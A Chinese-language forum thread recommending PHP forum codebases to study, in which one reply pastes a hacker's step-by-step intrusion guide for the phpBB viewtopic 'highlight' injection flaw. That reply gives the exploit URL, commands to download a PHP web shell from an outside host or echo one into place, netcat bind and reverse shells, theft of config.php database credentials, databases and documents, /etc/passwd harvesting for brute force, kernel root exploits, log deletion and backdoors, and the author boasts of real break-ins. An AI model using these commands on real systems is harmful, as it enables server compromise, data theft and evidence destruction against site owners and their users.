phpbb。没了。论坛是众家所长。

解决方案 »

  1.   

    我也推荐phpBB,风格代码太优美了
      

  2.   

    http://www.zend.com/
    这里有很多优秀的代码~
      

  3.   

    phpbb有漏洞,
    phpBB的viewtopic highlight漏洞在unix下的入侵思路1. 文章作者:
    作者:ik www.zuso.org2. 漏洞名称:
    phpBB viewtopic highlight= 漏洞3. 编写前言:
    虽然这个漏洞出了有一段时间, 但是到现在还是许多使用者没有更新.最近更是新出了
    phpBB2.x&PHP4.3.x unserialize函数内存泄露漏洞.但是很多朋友拿到了数据库密码和
    文件目录却不知道如何使用.
    颜颜也说没有看过针对phpbb run on unix like system 的应用文章, 我想刚好, 就把一些应用跟思路写了出来.
    两个漏洞不一样,但是思路我想还是可以借鉴的.
    呵, 废话不多说了, 漏洞是天天有新的,最主要的是你的思路.4. 漏洞用法:
    http://www.xxxx.com/phpBB2/viewtopic.php?t=1&highlight=%2527%252esystem(CMD)%252e%2527
    CMD=指令 用 ascii code 编码, like chr(108)%252echr(115) 即为 ls 的意思!
    更多 ascii code 请参考 http://www.asciitable.com/ , 这边不多介绍啰 :p5. 我的思路:
    一般发现论坛有问题之后, 我的第一步会是先检查他的权限, 以及我是否有足够权限写入! 
    用 'id' 会看到你现在的身分! 一般 apache 预设都是 nobody 或者 www !
    来寻找可以写入的地方吧 'ls -laR' 一般在 ~path/files/ 下面可以写入...试试看!
    嗯, 再来检查 wget 是否存在, 'ls -la /usr/local/bin' 看看有没有 wget...
    如果有, 我的下一步就是 'wget -O ~path/files/ik.php 
    http://www.xfocus.net/tools/200405/PhpShell.php'
    (希望可以写入呀, X客中国那次就是这样玩的!) 成功的话直接在 ~path/files 目录下就可以执行 ik.php 了!
    但, 又有问题了, 如果在 bin 下面找不到 wget 怎办? 那就用 echo 吧! (总不会连 echo 最基本的都没吧=_+)
    丢一个最小的 php shell 吧! 'echo "<? system(\$_REQUEST['cmd']); ?>" > ~path/files/ik.php' ! 若能写入就成功了!
    用法就是 'http://www.xxx.com/phpBB2/ik.php?cmd=指令' ! 那... 如果都不能写入怎办!? 就此放弃吗? 想太多!
    试试看 nc 吧! 把他 bind 一个 port 出来 'nc -l -p 5555 -e /bin/sh' 然后我在 'telnet targetIP 5555' ! 成功的话就进去了!
    什么!? 他在 router (IP Share 后面怎办!?) 那就让他自己连回来吧, 先在我的 linux box 上面 'nc -l 6666' 开始监听!
    在目标上面再执行 'nc myIP 6666 -e /bin/sh', 如果成功的话, 我的这边就成功取得 shell 了!
    那... 如果以上方法都不行怎办!? 总不能就此放弃吧!? 因为是 php 使我不得不想到 phpmyAdmin 呀!
    来看看他的 config.php 档吧, 黑不掉首页 拿不到权限, 资料库总该借瞄一下吧!? 瞄不到, 密码也该借一下吧!?
    这个写着 MySQL 连线资讯的档案, 大家应该都会用猫 (cat) 去看! 但有的时候, cat 并不能使用, 该怎办呢? 
    找找其他指令吧, 我会用 more config.php 试试, 接着 tail -f config.php 等等! 基本上都可以用的! 若没有该指令就换下一个!
    得到这份密码, 令我想到更多事情可以玩, 我会先 'locate phpmyadmin' 'locate phpadmin' 找出有没有 phpmyadmin!
    如果有, 就连到 ~path/phpmyadmin 然后用那组帐号密码进去帮他备分一下阿, 做人要厚道, 黑他之前也要备份一下哩 :p
    就像那次我黑 X客中国 就是如此, 将近 500mb 的资料库从中国抓到美国= =, 抓完才帮他清除资料库呢!
    当然啦, 除了帮他备份外, 更别忘了把自己变成管理员呀, 把 user_lever 改成 1 ! 呵, 酱就可以利用它来发广告信了! 爽 :~
    那... 如果没有 phpmyadmin 怎办!? 'nmap targetIP' 看看有没有开 MySQL 啰! 有的话就试试看从我这边自己装个 phpmyadmin...
    另外有些情形是, ~path/phpmyadmin 明明就存在, 但是就是 403 Foribben, 怎会酱!? 被 .htaccess 锁住了!
    就像那次 www.g***Q.com.tw 一样, 就只能说 'rm -fr ~path/phpadmin/.htaccess' 啰, 砍掉就可以成功登入了, 记得帮他备份呀! :p
    完了! 如果没有 phpmyadmin 然后他又不给我开 MySQL 怎办!? 那就试试看其他的, 'pwd' 看看我在哪!?
    一般都是 /home/xxxx or /usr/home/xxxx <--- xxxx 一般是那个网站的管理者在主机上面的使用帐号耶! 试试看呀! 冲~
    如果是虚拟主机的话, 一般密码都是设一样的, 然后好的是都会开 ftp, 那次那个 "早安X女" 的网站就是这样呀...
    不小心刚好设成一样就进去了, 就帮他传了几个 phpshell.php 也帮他备份了一些影片 :p ( tar 打包真好用 XD)
    再惨一点, 就看看那组密码跟管理员有没有一样!? 有的话就进去把自己变管理员, 当个地下网管来补偿一下失落的心灵呀 XD
    补充几点, 如果你黑进了什么政府或者什么公司的网站的话呀, 除了帮人家被份资料库, 补了 viewtopic.php 外呀, 文件别忘了呀!
    'locate *.doc''locate *.ppt' 把路径记下来, 假设是 /home/ik/doc/ 有一堆 *.doc 档案的话...
    那就 'tar -cvf * lamik.tar' 然后 'mv lamik.tar ~path/' 接着就 http://www.xxx.com/phpBB2/files/lamik.tar 抓下来吧!?
    呵, 我曾经玩过的就差不多这些了, 阿, 'cat /etc/passwd' (for linux) 'cat /etc/master.passwd' (for BSD)
    这能干麻!? 没有密码呀, 连 md5 都没怎办!? 这个就是把它抓一份下来呀, 然后看看找个 ssh brute force 啥的猜啰!!6. 若拿到 shell :
    拿到 shell 以后能够干麻!? 先看看权限够不够清 log 吧!? 'locate *-access_log' 找出 apache 放 logs 的目录
    然后就 'rm -fr ~path/*-access_log' 基本上权限应该会不足, 但是那次 X客中国 就可以用 :p
    在把他 ~/logs 属性改一下, 他就永远不会跑出 log 了 :p 他也不用浪费空间装 log, 也更不用来找我拿资料库呀 :p
    如果没办法怎办?! 那就试试看能不能找到 exploits 去拿 r00t 呀, 如果是 linux 的话, 试试下面两个档案好了...
    mremap_pte.c 或 ptrace-kmod.c 师父说这两个是最好用的耶 :p 试试看啰 :~
    gcc mremap_pte.c; ./a.out 如果成功就变成 # 了唷! 另外 ptrace-kmod.c 也是一样滴 :~
    再不行怎办!? 到 www.securityfocus.com 或者 www.k-otik.com 找找有没有可以用的 exploits 吧!
    (补充一下, 可以用 'uname -a' 来确定 kernel 版本, 然后 "对症下药" 会减少你许多宝贵的时间唷 :p)
    毕竟这篇文章不是在教你怎样用 exploits 呀+_+, 只是分享一下我的心得, 没啥技术可言的心得 :p
    无论如何, 先在上面丢个后门吧, for unix like 的后门,自己 google 吧, 长辈不会允许我分享出来的 :p
    执行下去, 让他自己连回我 linux box, 然后就 logoff 吧, 等等网管发现跑来怎办!? 呵, 还是小心点呗 :~ 
    基本上就是这样了, 测试 -> 尝试取得 shell -> 取得 shell 用 exploits 提升权限 -> 开门 -> 清 log
    以上几个步骤, 能够做到多少就尽量做吧, 记住一句话: 方法永远多一个, 肉鸡永远少一台! 就看你如何应用了 :p7. 文章备注:
    以上只是我的小小心得分享, 似乎太晚写这篇文章了, 但仍希望这篇文章对您有所帮助!
    这个是我写的第一篇文章, 呵. 不过漏洞真的要少玩点了呀, 好好学习才是实在的吧!?
    tt 长辈说过: 黑站黑的越多, 只会让人更怕你; 技术学的越多, 会让人更尊敬你! 
    句句是真理呀, 我们不该在迷糊在黑站的世界里了, 黑归黑, 也别忘了多学点呀! 一起加油吧!
    谨以此篇文章作为一点小小的分享, 并送给我最爱的颜颜 :)8. 版权问题:
    这篇只是整理一下我所玩的跟应用的心得而已, 没什么原创性, 纯属分享 :p
    当然, 如果您愿意或认为有收藏价值, 欢迎转贴或流传, 但请务必保持文章的完整!
    有任何问题, 欢迎一起切磋讨论, 我信箱: fake.ik [at] Zuso.org本文只是纯分享心得 如果读者因文章而触法 皆与作者无关 .Thanks.
      

  4.   

    while( list($var, $param) = @each($strip_var_list) )
    {
    if ( !empty($HTTP_POST_VARS[$param]) )
    {
    $$var = trim(htmlspecialchars($HTTP_POST_VARS[$param]));
    }
    }
    这个不错,用法以前没有用过
      

  5.   

    推荐ipb和phpmyadmin,代码写的太好了,而且里面好多实用的东西
    phpbb还没看过,有时间研究下
      

  6.   

    http://www.xmbforum.comdiscuz由此修改而来
      

  7.   

    别人不知道,呵呵,我是准备读一下Discuz
    毕竟是中国的,比较符合国人编程习惯,呵呵
      

  8.   

    phpadsnew里面的安装程序值得一看